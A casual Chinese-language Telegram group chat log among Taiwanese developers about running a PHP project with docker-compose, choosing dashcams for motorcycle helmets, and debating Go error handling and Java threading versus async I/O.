[photo](media:AgADBQADUqkxG-fWwVacfatq4_IEDt-JAjMABAEAAwIAA20AA3GxAAIWBA@telegram)
[photo](media:AgADBQAD7agxG_ZQwVZr7NXBZJhSTOqPAjMABAEAAwIAA20AA3yxAAIWBA@telegram)
(大企業)
有學過一下,不過還是覺得laravel來開發比較好開發耶
🤔 倒是
<- 願意提供幫助
Yami 老師要開課了嗎
umm 放在安全帽上的行車紀錄器有推薦的嗎?
@seadog007 你用的 mysql 是
哪版的
7ㄅ
應該
我來看看
[photo](media:AgADBQADBqkxG0MYwVbph7Ziecl9pSi5-TIABAEAAwIAA20AA76qAQABFgQ@telegram)
我想想喔
為什麼不是8呢
好像是我某次升級發現轉換困難
就降回來了
我記得本來是5.5
升級的時候我有來這邊哀嚎過
[photo](media:AgADBQADVKkxG-fWwVZI60ELWJ3ZzyCD-TIABAEAAwIAA20AA5BKAgABFgQ@telegram)
api/stat.php戳得出來ㄇ
沒東東
不懂ㄛ
你先推上你那邊 我抓來連看看
FastCGI sent in stderr: "PHP message: PHP Warning:  Division by zero in /var/www/html/src/common.php on line 273PHP message: PHP Warning:  Division by zero in /var/www/html/src/common.php on line 278" while reading response header from upstream, client: 10.1.0.1, server: _, request: "GET /api/stat.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "localhost"
🤔
好啦沒資料
kk
我用
mysql 8 欸
我要丟回 5 嗎
隨便la
還是沒差
一樣
推了
link
sudo docker-compose build && sudo docker-compose up 應該就會動了
rexx0520/breach.tw
嘔嘔嘔
sudo docker
不 sudo docker 不會動ㄅ
他會說什麼找不到 socket 之類的屁話
sudo usermod -aG docker $user
雖然這跟sudo usermod -aG docker sudo是一樣ㄉ
嘔嘔
這樣以後docker都不用sudoㄝ
Couldn't connect to Docker daemon at http+docker://localhost - is it running?
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
你有重登ㄇ
yay
user加進去group要重開shell才會生效R
而且為什麼你是http+docker
好問題
SJ8 沒
喔對了你沒有composer install
這樣不會炸ㄇ
等等你怎麼把這堆檔案噴在外面
丟進去一個docker folder la
那好貴ww
我現在頭上是SJ4000
其實我剛才有點被5000系列吸引
我只噴了一個
docker-compose ㄅ
這好用嗎?ww
[sticker](media:AAQFAAMkAAPXHYsGLNCnFU9Cg6NbHL4yAAQBAAdtAANqEgACFgQ@telegram)
其他都放在 docker 資料夾裡面ㄚ
🤔🤔🤔
我按搜尋的時候是沒東西啦
那你乾脆把docker-compose.yml丟進去R
這樣就不能在根目錄 docker-compose ㄌ
沒差ㄅ
違反慣例
(?
這樣nginx config比較好寫
可以直接擋掉docker這個資料夾
我沒 import nginx config 欸
他就本來就會動ㄌ
我說真實的la
kkk
我知道你把php跟nginx弄再一起ㄌ
yay
[photo](media:AgADBQADVakxG-fWwVa2rR-qraMAAdRjgvkyAAQBAAMCAANtAANzUQIAARYE@telegram)
臭胖子
拉不下來
@lekous 順便把phpmyadmin掛上去R
🤔🤔🤔🤔
[photo](media:AgADBQADDKkxG0MYwVa4c6Byh50kV4B4-TIABAEAAwIAA20AA69JAgABFgQ@telegram)
你port開在哪R
[photo](media:AgADBQADDakxG0MYwVZRcvko7moRC519-TIABAEAAwIAA20AAwlMAgABFgQ@telegram)
XSS
XSS
等你
然後port映射就開在8080
80
8080:8080
🤔
然後phpmyadmin掛上去應該就行了ㄅ
大概ㄅ
我被拉去吃宵夜ㄌ 晚點會來弄
[sticker](media:AAQFAANMBgACldrcD6pAX-r70LcVrZD2MgAEAQAHbQADp28AAhYE@telegram)
在啦幹
[sticker](media:AAQBAAMcAAP88iADojA3x6p2o1JrtOcvAAQBAAdtAAP1AQACFgQ@telegram)
SJ5000X 還不錯
我推 SJ8 Pro (?
Sony
FDR X1000之類的 (?
夜晚拍起來比較清楚
你應該買行車記錄器ㄉ
買4K運動攝影機來錄484哪裡怪怪ㄉ
有甚麼問題嗎

汽車用的不行齁 (?
夜視功能不好
為啥R
騎車 淋雨
喔好ㄅ
市區的話其實還算可以
可是如果住偏鄉
例如我
大概就不行ㄌ
你都能來COSCUP了
沒事
[sticker](media:AAQFAAPhAwACkYvyB6Ej1pwzPZyPiSb4MgAEAQAHbQAD2lYAAhYE@telegram)
[photo](media:AgADBQADWqkxG-TYwVblWfXt7gEQFuSu-TIABAEAAwIAA20AA0atAQABFgQ@telegram)
[photo](media:AgADBQADFqkxG1yXwFb0hBTbh_fdpK5_-TIABAEAAwIAA20AAzNLAgABFgQ@telegram)
[sticker](media:AAQFAAN1AAN2MdIJtGtOWHLn99QUhPYyAAQBAAdtAAM8bAACFgQ@telegram)
我感覺SJ4000有點棒(?)
就 可以紀錄啦 (?
CP算高ㄉ
就反正行車紀錄器的概念也不是要拿來欣賞
SJ4000我看 @as2174 的畫面感覺已經可以了ww
我在找...可能其他的配件之類的吧(#
你可以騎車直播阿
ummmmmmmmmmmmm
實時公布我在哪裡
或是邊騎車邊打遊戲王(x
這是換車的秘術吧
手機 on
ㄜ 我有很多 如果你要的話
ummm
可是在家 ㄏㄏ
我也hen多(
我明天再去找你玩(#
不會比我多 (欸
Kk
@Sciuridae 那個可以夾桌子的東西
Takeway R2
順便手機轉接座也來好了
+ PH-05
是說,昨天看到 gopro6 +防水殼6k5
[sticker](media:AAQFAAN1AAN2MdIJtGtOWHLn99QUhPYyAAQBAAdtAAM8bAACFgQ@telegram)
可以買GB8ㄌ
(X
www感覺可以上熱靴就
防水GG(?
得買殼ㄅ
我ㄉ SJ 沒有防水我照樣淋雨也沒壞啊

@s3131212 要不要寫篇 breach.tw ㄉ文
或是講個 Lightingtalk
度度
你去講
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
視訊
你寫啊
這是一件很尷尬的事
密碼丟失ㄌ(X
我每次想發文
都不記得密碼
然後就懶得寫了
(跑
nil
nil
append(append(a, b),c)
那個允許你throw err(==nil)的語言嗎
黑進去啊
nil
並不是這樣好嗎幹你娘
[sticker](media:AAQFAANUAANPmpcSOvjcMd-tz-vmYcoyAAQBAAdtAAPHMAACFgQ@telegram)
你這是人身攻擊喔
err = nil
return err

if err != nil {
// Error handle
}
噢。
說起來居然沒有enforce扔出去的err不准是空值
然後你程式就吐了err但是沒有進error handle
[sticker](media:AAQFAAN8AAN2MdIJwzgprbPCdVF53_YyAAQBAAdtAAPBHgACFgQ@telegram)
人家5k星星的專案都這樣寫的
不過js在這點是半斤八兩
throw "string"
保證你找不到任何error stack
還有強制塞GOPATH
雖然我記得新版改掉了
所以go好在哪裡
好在他比php強
而且沒java難懂
然後他搞streaming比java簡單一點點
streaming?
channel什麼的
跟js一樣可以很簡單non blocking亂塞stream給client
低調問
所以webscoket之類會比較好搞
他是誰啊
[photo](media:AgADBQADEKkxG0MYwVYb2sqo2Uj2cYqJAjMABAEAAwIAA20AAzixAAIWBA@telegram)
感覺是個我認識的人 但不知道本名
java的原生stream全都blocking吧,要non blocking要用netty,然後netty那文件…
我覺得超級不行
我以為java的stream和js的87%像
只是他很sync
所以才說他很blocking
IO thread開起來阿(
java的thread那麼簡單開
然後 效能 -> 笑能
不會吧
幾百個連線就幾百個thread
IO的thread應該沒啥問題
[photo](media:AgADBQADEakxG0MYwVaBnz2aP64NPuWm-TIABAEAAwIAA20AAz2wAQABFgQ@telegram)
= =
ㄇㄉ笑死
TG 圖片load不出來QQ
原來如此
幾千個連線就幾千個thread
嗚嗚嗚
是阿
所以他是誰啊
[photo](media:AgADBQAD9qgxG480wVZYkzevJ1Kzkfy2-TIABAEAAwIAA20AA9WsAQABFgQ@telegram)
java的web server不就真的這樣幹嗎
幾萬個連線…大概server就thread開到母湯掉了
不會la
沒那麼簡單炸吧
然後還有記憶體用量
thread沒多吃記憶體阿
[photo](media:AgADBQADEqkxG0MYwVaAUhP4DgABLRSJdPkyAAQBAAMCAANtAAOeSgIAARYE@telegram)
全面起飛吧
最後netty就出來了
我pid上限是4194304
不過那個文件我覺得像大便
COSCUP服務台小精靈
場務組小精靈
Bob的老婆(
完全就是javadoc export出來就算了
有人知道ㄇ
那個實際上只是外包給native處理吧wwww
Trista
人家doc有註解
kernel.threads-max = 2063087
這個 ID 可能比較有聽過,掉 mac 真是一大(ry
都開爆
camp 那個 Trista 嗎,還不同人?
thread原本就該隨便開阿(
都是 Bob 老婆了你覺得ㄋ(
thread只有在開和關,還有要跨thread處理時才會慢阿
喔喔,沒看到
拍謝
[sticker](media:AAQFAAOBCgACH-F-CgP0JVf9qo1CX6DKMgAEAQAHbQADnjoAAhYE@telegram)
你怎麼掉電腦ㄉww
而且跨thread是因為要資料一致
跟async比較起來靠北慢阿
慢是比較出來的
沒吧
但是 Async 也要靠 Thread
最主要是資源效率有夠低
就像 node.js 其實就默默地幫你在後面開 async thread
然後等待結果不是每個thread自己去要